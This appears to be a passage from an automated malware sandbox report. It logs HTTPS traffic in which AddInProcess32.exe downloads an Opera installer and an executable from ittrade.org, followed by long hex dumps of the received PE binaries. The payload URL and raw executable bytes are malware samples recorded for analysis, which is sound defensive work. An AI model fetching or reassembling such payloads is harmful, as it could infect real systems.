                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: c1 23 c8 fd df 1f f6 49 23 cb 5b 24 44 c2 5f c9 c3 76 85 d2 74 39 33 c0 f7 ee 3f 52 44 c1 15 0f b6 0f 3b ca 0f 44 46 ff 5d f7 ec 74 20 47 14 75 eb 92 c2 4f 66 0f 3a 63 47 f0 40 8d 4c ba 0d ed fe 39 f0 0f 42 c1 75 ed 40 b8 f0 18 23 c7 93 c0 ef ee 06 eb 8f 00 af ba 14 ff d3 e2 7c f8 23 fa 75 77 f1 7e b0 14 1d 40 10 83 c0 10 13 42 ec 0f bc ff 3b 0a e8 d7 03 c2 9d 08 33 c0 83 c9 ff f2 ae 83 c1 88 77 6f e0 01 f7 d9 c2 8a 45 0c fd 0d c7 01 38 07 60 0c f7 af e7 02 8b c7 fc 68 8e 51 74 65 e2 86 79 08 33 c9 99 b3 20 c9 58 bc 5d 0e 50 51 00 ce 70 1b fa 1b 60 d9 13 d9 53 39 4d 0c 76 e4 10 8b bb fa ff ff c2 88 0f 85 d2 7f 02 8b c1 40 39 45 0c 77 04 6a 22 eb 09 8b 5d 99 75 1f 32 bc 8f fd 6a 16 8b 45 20 5e 45 89 70 18 51 48 a9 fe ff ff b3 75 c6 eb 7f 8b 43 08 8d 77 01
                                                                                                                                                                                                                                                            Data Ascii: #I#[$D_vt93?RD;DF]t GuOf:cG@L9Bu@#|#uw~@B;3woE8`hQtey3 X]PQp`S9Mv@9Ewj"]u2jE ^EpQHuCw
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 89 d7 29 c7 89 f1 57 8b 03 69 cc 05 40 0d be 5f da 2c 50 d0 39 97 08 7f 2f 4d a6 fe ff 1d d9 31 c0 eb 1a c1 e0 04 0f be 32 01 c6 89 f7 81 e7 d3 0c 70 ff ff f0 89 f8 c1 e8 18 09 f8 31 f0 42 39 ca 75 e2 5e 3e 46 98 cb cd 5c 39 02 3f 3f bf ff ff bb 37 45 46 c2 23 39 c2 74 15 0f b7 1a 0f b7 0f 66 39 cb 72 0a 77 0d 75 ff 76 ff 83 c2 02 83 c7 02 eb e3 d5 eb 0f b1 0a 39 c2 b8 60 00 cb 76 c9 96 c7 4f 8f 75 08 bf a4 f8 7e d8 d1 ff c1 68 cc 89 f0 82 0c b0 3c 87 39 b7 7f 2f bf 1c b7 ec 75 6e 80 80 c1 e0 3e c1 30 ea ce 25 3f bf 83 ec 38 ef d0 87 00 07 e6 30 81 8b 5d 0c 50 40 ff 23 24 8b 4d 14 f6 41 04 01 0f 84 e0 a6 a2 d8 bc 8d 75 93 00 f9 fc 27 dd 04 93 d6 76 05 6e c0 71 45 a8 7f f7 ff c0 8b 75 cc 81 fe 00 05 6e 08 74 24 f8 f0 0f c1 46 04 85 c0 75 c1 8a 97 fb ef 04
                                                                                                                                                                                                                                                            Data Ascii: )Wi@_,P9/M12p1B9u^>F\9??7EF#9tf9rwuv9`vOu~h<9/un>0%?80]P@#$MAu'vnqEunt$Fu
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: c6 3e 2c c6 10 bc 77 80 7d 97 10 8c 42 21 40 43 31 e3 00 41 20 e9 53 88 01 80 25 c0 53 a6 88 00 37 b5 00 66 3a 8b 7d b8 55 87 00 21 09 6d 55 66 09 f4 08 f0 39 45 e0 0f 56 04 05 ab f7 5c 18 0e 8e 32 33 08 97 35 16 b1 82 ff 0f 45 90 c5 90 00 0f 3c 7f 20 16 a9 b0 f5 2e 22 18 50 12 4f 34 05 29 b6 c8 6f 34 8a 0a 0c 38 88 06 df 97 2e 08 97 a4 d6 0f d4 2e 0a 7e 07 d9 80 78 0b 00 78 15 86 29 a8 e9 ab 4e fe 00 15 06 8a b1 2a 30 f0 14 00 04 1a 0a 1b 16 fb 00 e9 9c eb eb 47 04 3f 7c 55 00 19 ee 7f 20 97 00 35 02 dc c7 b9 e5 fe 47 46 01 b7 4d e0 c7 01 00 04 da 24 08 55 75 e0 25 b0 00 b4 ff 55 84 a8 4c bc 79 08 8b 5d d4 41 f5 7f 53 6a 85 f6 75 30 39 df 74 0f ff 71 08 df fd 51 dc 95 01 e3 36 c2 8b 71 10 19 2b e8 11 03 67 15 c1 43 82 0c 67 83 c4 7d e0 43 f4 00 c3 d6 6e
                                                                                                                                                                                                                                                            Data Ascii: >,w}B!@C1A S%S7f:}U!mUf9EV\235E< ."PO4)o48..~xx)N*0G?|U 5GFM$Uu%ULy]ASju09tqQ6q+gCg}Cn


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            17192.168.2.555581107.167.110.21144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=OperaSetup.exe
                                                                                                                                                                                                                                                            ETag: "6b0b042dd7fc05b282c63d2958ab7d0c"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16062INData Raw: 31 61 34 64 0d 0a 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 03 00 fd 65 e5 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 80 2c 00 00 90 00 00 00 60 26 00 40 ea 52 00 00 70 26 00 00 f0 52 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 53 00 00 02 00 00 13 e6 2d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4
                                                                                                                                                                                                                                                            Data Ascii: 1a4dMZx@x!L!This program cannot be run in DOS mode.$PELee",`&@Rp&R@S-@
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: ed 04 89 65 c6 fa ff c1 80 e1 b0 89 55 d0 80 f9 20 74 10 25 35 f8 eb 1b e8 63 d2 f2 89 55 d4 59 7d a9 89 7d a5 41 ae ae ef 0e 98 76 45 88 8d 75 dc 02 56 9a 34 a3 fa 5d 02 36 c7 45 cc 00 05 53 40 ae 70 0d 55 f6 7e e9 85 03 82 95 55 56 e8 dd fd 63 e9 74 7d 8b 5d dc 81 fb 38 08 0f 85 31 f1 50 64 6a 57 58 45 cd 89 29 fe df 19 ca 8d 6a b8 89 f9 50 8b 7d d0 57 3e f5 ff ff ff e0 01 e8 83 c0 88 8b 55 d4 89 d1 29 f1 39 fa 8d 4c 0d 88 0f 44 c8 0f be 55 14 ae eb 4d d0 75 10 ea 88 50 ff 75 69 08 9d 58 9b 20 58 3a ed 33 f7 1c 87 33 14 1d 14 18 a5 ac ff ff 4f 54 03 95 91 56 8d 45 b9 89 c2 0f b6 40 ff 83 f8 2b 0f 84 01 ee 6f fa 1d fd 83 f8 2d 0f 84 f8 14 83 7d e0 02 0f 8c ec 09 46 4d b8 a6 3c 4e e4 07 7d b9 2b 8e 1b 02 18 b8 8d 55 ba 69 13 f5 ef fa 8f c5 89 75 d8 b4 8d
                                                                                                                                                                                                                                                            Data Ascii: eU t%5cUY}}AvEuV4]6ES@pU~UVct}]81PdjWXE)jP}W>U)9LDUMuPuiX X:33OTVE@+o-}FM<N}+Uiu
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 74 3b 83 c8 20 16 d0 fd 7f 66 b3 16 b8 00 00 03 d0 23 d8 3b d8 75 1e 47 ba e1 6f c0 14 2e b9 23 c2 3b c2 75 0d 83 b2 ba 81 4d 1c 40 89 79 5d 04 c4 33 c0 c9 53 a7 af 6b 58 40 03 39 ba 0c 6b a6 33 71 53 b2 03 6d 22 70 64 6b c2 3f c3 ee bf 8b 44 24 10 89 6c 24 10 8d 03 2b e0 e0 97 10 31 82 81 e1 ff 45 fc 33 c5 50 89 65 e8 ff 75 f8 a4 4e 7f 40 c0 1b c0 8d 45 f0 64 25 c3 cc c2 dd f1 e9 ef 00 00 3b 79 10 75 01 c4 0f 5e 9d 81 ec 1c 81 0d 29 c9 c9 b7 38 5e 10 3c 84 5f f7 ff 5e 0c 89 15 00 05 5e 08 89 1d 05 04 b1 5e 00 72 de bd fb 7b fc 66 8c 18 28 66 8c 52 5e 1c 66 8c 20 5d f8 66 8c 77 c3 3f fe c0 f4 66 8c 9e f0 66 8c 2d 89 ec 9c 8f 14 f8 33 7d 78 5e 20 8b 45 19 5e 14 6d 5e 18 8d 45 76 ae 6f 0a 5b 5e 24 8b 85 e4 15 c5 5e 18 22 ea 23 ec 17 5d 1c 48 10 09 04 00 1e
                                                                                                                                                                                                                                                            Data Ascii: t; f#;uGo.#;uM@y]3SkX@9k3qSm"pdk?D$l$+1E3PeuN@Ed%;yu^)8^<_^^^r{f(fR^f ]fw?ff-3}x^ E^m^Evo[^$^"#]H
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 09 26 ff 0e fe ff 0f b6 5d 18 89 85 70 ff ff ff 0f b7 30 8d 48 f6 0c 83 fe 2d 75 05 83 cb 44 47 e2 ff 02 eb 05 83 fe 2b 75 09 0f b7 31 0e 0c c7 44 dc c0 57 da 3a e5 b8 10 ff 7a 43 40 5d 9d f8 3b c7 45 f4 6a 5d e4 d8 1b 1f c7 45 f0 f0 06 ec fa ab 86 e4 d8 1b fa ba c7 45 e4 70 64 c7 45 e0 e6 06 dc f0 c8 b1 37 74 d8 66 c5 c7 45 d4 70 06 d0 e6 b1 37 74 e4 cc f0 c8 66 bf c7 45 c4 70 06 23 c7 de d0 c0 66 71 c7 45 bc 70 06 b8 e6 b4 f7 d8 ef 91 f0 b0 66 0d 84 ac 70 06 a8 50 0e 0d 1e 39 72 ec a4 5a 06 a0 d0 9c da 98 20 0f c7 7e 8f fd 1b 94 2a 06 90 40 10 0d 8c 4a 06 88 e0 00 dc 63 bf 17 0d 84 ea 06 80 10 18 0d 11 50 ec 83 ef 1a 09 d4 df 70 d7 4a 1a ec 6a 30 5a 71 09 83 ff 10 0f 85 e2 10 dd 00 df 2d 66 3b f2 0f 82 af 66 3b b5 77 74 07 0d a6 73 ce c6 2b c2 96 7f 98
                                                                                                                                                                                                                                                            Data Ascii: &]p0H-uDG+u1DW:zC@];Ej]EEpdE7tfEp7tfEp#fqEpfpP9rZ ~*@JcPpJj0Zq-f;f;wts+
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 8b 85 30 a6 4b f4 df 04 c1 dc 0f b7 c8 8d 41 bf 83 f8 19 73 ff df 41 49 20 6a 38 5a 83 f9 75 75 41 0f b7 8d 32 25 19 8f a4 fb 01 83 f9 74 75 2a 16 34 66 75 fb 4d 50 f1 13 66 39 95 9b 75 0a 66 83 bd 38 1f 8b 88 9f bb 00 74 29 09 12 2d 0f be c0 99 fe dc 20 17 0f 85 d6 b9 1a 08 0c 99 aa b3 e8 ec 0a a2 03 9a b8 ef eb 0d 06 b2 bb 20 19 c0 f9 37 59 f8 10 27 b8 20 e8 c7 85 d1 6d 8d e3 ff 14 08 6a f9 e0 33 c0 66 39 06 74 24 b8 7c 86 c7 ff f1 39 85 88 73 17 57 56 50 ff b5 4e 23 aa 19 ef 0e 57 5e 75 55 eb 0b 62 4f 72 01 fc 37 8b 85 3b 11 53 ff 83 e4 3e fd 75 10 8b 00 ff b5 5a 89 01 32 35 75 1d 7c 12 fe 22 eb 04 33 c0 8b d8 d7 f9 b0 8b c3 02 5f 98 26 23 88 5e a9 33 41 91 72 e0 1c e4 34 e2 c0 9b f5 ff ff 53 33 db 56 8b f3 39 5d 10 7e 22 57 8d 7d 10 8d 7f 04 ff 37 50
                                                                                                                                                                                                                                                            Data Ascii: 0KAsAI j8ZuuA2%tu*4fuMPf9uf8t)- 7Y' mj3f9t$|9sWVPN#W^uUbOr7;S>uZ25u|"3_&#^3Ar4S3V9]~"W}7P
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC16384INData Raw: 40 6b c1 14 8b 5e 10 3b 54 18 04 2a ff db fd 6f 7e 28 0e 75 dc 3b 54 30 08 46 7f 19 0e 4e 10 8b 44 08 04 ff bb 6f a2 40 2b 55 d8 8b 14 c2 44 eb 09 41 89 4d d4 3b 4e 0c 72 b8 7b 82 fb c0 52 56 6a 00 61 48 33 db 9e 21 5d fc 10 45 83 60 05 b6 c7 7f 25 bc 8b 7f 9c 4f a1 8b c3 ab 08 8b 5d e4 8b c0 0d ee 0d 36 4d 0c 89 41 f2 2b 01 1f d5 0e e1 07 07 0d 13 c8 89 48 1e c4 e6 49 01 61 d9 4b 83 77 67 44 c1 45 81 a5 12 08 21 05 93 1d fd 9b e6 19 74 09 22 75 2a 83 7d c0 00 75 24 5b 20 fc 8e 1b 0c 8b 3a 1c 60 59 f6 13 83 7d bc 00 0f f5 dd 58 14 09 56 15 1b ba 59 59 c3 ac 22 78 70 a8 f8 00 db 61 45 c1 ff 36 83 78 10 03 75 30 81 57 ff 06 ea 1f 15 83 78 1c 00 75 da 4c 31 33 c9 41 89 48 20 67 08 70 14 99 c4 49 43 fd 40 40 83 77 75 0c 57 c7 2f fe 86 0a af 8b 3e 33 db 85 ff
                                                                                                                                                                                                                                                            Data Ascii: @k^;T*o~(u;T0FNDo@+UDAM;Nr{RVjaH3!]E`%O]6MA+HIaKwgDE!t"u*}u$[ :`Y}XVYY"xpaE6xu0WxuL13AH gpIC@@wuW/>3
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC16384INData Raw: fc 8b c7 31 78 08 04 6f 74 7d 16 d7 41 2c 03 fd 2f e4 5a 10 df 61 26 a0 0f 10 49 57 24 a6 9e 11 d0 8b c6 27 1c 66 4b 06 0e a9 a0 1c 54 0d d2 0b fe dd ee 83 c1 04 14 75 de 55 ff 83 cf 01 85 ff 75 1e 47 54 7f e8 bf fc 50 68 0b 00 00 20 eb 25 b2 f8 03 7d 05 f6 9f 23 78 b5 3b 6e 0f bf 59 eb f3 26 4c b8 a8 08 b9 62 8f 35 2c 2a 15 d5 c9 eb d4 61 45 34 02 6f 83 53 1b e8 90 8b 60 89 af 09 50 ee df 23 80 6a 94 29 74 16 6a 09 13 38 04 34 14 8d 02 5e d1 48 11 1c 27 c1 4d 1d c5 96 04 30 4c 1b 33 0a de 55 d5 d2 85 5d c0 5d c3 0f ee 77 ff 23 af 66 83 f8 41 72 06 05 5a 76 09 83 c0 9f 08 25 2c 18 ff 19 77 03 42 eb e2 8b c2 b6 80 00 f4 18 d0 a6 53 d8 08 57 89 ff 7f 15 d4 f0 02 c7 8d 7d f0 89 45 ec 33 c0 ab ab ab 14 fc 86 0c c9 f0 4d f0 33 d2 89 88 88 fa 27 76 a6 8d 8e d4
                                                                                                                                                                                                                                                            Data Ascii: 1xot}A,/Za&IW$'fKTuUuGTPh %}#x;nY&Lb5,*aE4oS`P#j)tj84^H'M0L3U]]w#fArZv%,wBSW}E3M3'v
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC16384INData Raw: 66 0f d7 ca 23 c8 75 18 07 c9 23 c8 0f bd c1 03 ff 77 ff fb c7 85 c9 0f 45 da 83 c7 10 eb d0 53 18 d9 23 d8 d1 e1 33 c0 2b c1 23 c8 fd df 1f f6 49 23 cb 5b 24 44 c2 5f c9 c3 76 85 d2 74 39 33 c0 f7 ee 3f 52 44 c1 15 0f b6 0f 3b ca 0f 44 46 ff 5d f7 ec 74 20 47 14 75 eb 92 c2 4f 66 0f 3a 63 47 f0 40 8d 4c ba 0d ed fe 39 f0 0f 42 c1 75 ed 40 b8 f0 18 23 c7 93 c0 ef ee 06 eb 8f 00 af ba 14 ff d3 e2 7c f8 23 fa 75 77 f1 7e b0 14 1d 40 10 83 c0 10 13 42 ec 0f bc ff 3b 0a e8 d7 03 c2 9d 08 33 c0 83 c9 ff f2 ae 83 c1 88 77 6f e0 01 f7 d9 c2 8a 45 0c fd 0d c7 01 38 07 60 0c f7 af e7 02 8b c7 fc 68 8e 51 74 65 e2 86 79 08 33 c9 99 b3 20 c9 58 bc 5d 0e 50 51 00 ce 70 1b fa 1b 60 d9 13 d9 53 39 4d 0c 76 e4 10 8b bb fa ff ff c2 88 0f 85 d2 7f 02 8b c1 40 39 45 0c 77
                                                                                                                                                                                                                                                            Data Ascii: f#u#wES#3+#I#[$D_vt93?RD;DF]t GuOf:cG@L9Bu@#|#uw~@B;3woE8`hQtey3 X]PQp`S9Mv@9Ew
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC16384INData Raw: 42 47 39 f7 75 eb 89 da 31 c0 18 0c fb 47 b8 0f 95 c0 61 10 00 31 c0 40 eb f4 4e ae 70 01 0f 3f 57 31 26 b1 23 82 ff 55 10 89 d7 29 c7 89 f1 57 8b 03 69 cc 05 40 0d be 5f da 2c 50 d0 39 97 08 7f 2f 4d a6 fe ff 1d d9 31 c0 eb 1a c1 e0 04 0f be 32 01 c6 89 f7 81 e7 d3 0c 70 ff ff f0 89 f8 c1 e8 18 09 f8 31 f0 42 39 ca 75 e2 5e 3e 46 98 cb cd 5c 39 02 3f 3f bf ff ff bb 37 45 46 c2 23 39 c2 74 15 0f b7 1a 0f b7 0f 66 39 cb 72 0a 77 0d 75 ff 76 ff 83 c2 02 83 c7 02 eb e3 d5 eb 0f b1 0a 39 c2 b8 60 00 cb 76 c9 96 c7 4f 8f 75 08 bf a4 f8 7e d8 d1 ff c1 68 cc 89 f0 82 0c b0 3c 87 39 b7 7f 2f bf 1c b7 ec 75 6e 80 80 c1 e0 3e c1 30 ea ce 25 3f bf 83 ec 38 ef d0 87 00 07 e6 30 81 8b 5d 0c 50 40 ff 23 24 8b 4d 14 f6 41 04 01 0f 84 e0 a6 a2 d8 bc 8d 75 93 00 f9 fc 27
                                                                                                                                                                                                                                                            Data Ascii: BG9u1Ga1@Np?W1&#U)Wi@_,P9/M12p1B9u^>F\9??7EF#9tf9rwuv9`vOu~h<9/un>0%?80]P@#$MAu'
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC16384INData Raw: 8e 40 fe 5f 58 8b ac 8b 75 a8 8b 7d b0 89 7d d4 0c 16 13 60 e0 53 8b b0 b1 f8 b2 72 fc 69 80 7d d3 7a 06 0b 57 04 a6 7a c7 c6 3e 2c c6 10 bc 77 80 7d 97 10 8c 42 21 40 43 31 e3 00 41 20 e9 53 88 01 80 25 c0 53 a6 88 00 37 b5 00 66 3a 8b 7d b8 55 87 00 21 09 6d 55 66 09 f4 08 f0 39 45 e0 0f 56 04 05 ab f7 5c 18 0e 8e 32 33 08 97 35 16 b1 82 ff 0f 45 90 c5 90 00 0f 3c 7f 20 16 a9 b0 f5 2e 22 18 50 12 4f 34 05 29 b6 c8 6f 34 8a 0a 0c 38 88 06 df 97 2e 08 97 a4 d6 0f d4 2e 0a 7e 07 d9 80 78 0b 00 78 15 86 29 a8 e9 ab 4e fe 00 15 06 8a b1 2a 30 f0 14 00 04 1a 0a 1b 16 fb 00 e9 9c eb eb 47 04 3f 7c 55 00 19 ee 7f 20 97 00 35 02 dc c7 b9 e5 fe 47 46 01 b7 4d e0 c7 01 00 04 da 24 08 55 75 e0 25 b0 00 b4 ff 55 84 a8 4c bc 79 08 8b 5d d4 41 f5 7f 53 6a 85 f6 75 30
                                                                                                                                                                                                                                                            Data Ascii: @_Xu}}`Sri}zWz>,w}B!@C1A S%S7f:}U!mUf9EV\235E< ."PO4)o48..~xx)N*0G?|U 5GFM$Uu%ULy]ASju0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            18192.168.2.555584172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC130OUTGET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC673INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R5AtUpGWLPlZjJi9evFtiY6GAs83k16yzGD8wVS85IM%2BxJ778oqtBoYWDCYwNlvZ%2BJUQSeHA7sRYTNYLfkrMY9ODgGEdLUM9%2BtYXMMgilgmyItjRDf8e%2BnSZJY404A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282017aca90adb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC696INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00 5d c3 05 44 ff ff ff
                                                                                                                                                                                                                                                            Data Ascii: ff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]]D
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85 19 01 00 00 8b 4d 10
                                                                                                                                                                                                                                                            Data Ascii: ]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@fM
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e 64 3d 8e 00 00 c0 75
                                                                                                                                                                                                                                                            Data Ascii: XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~d=u
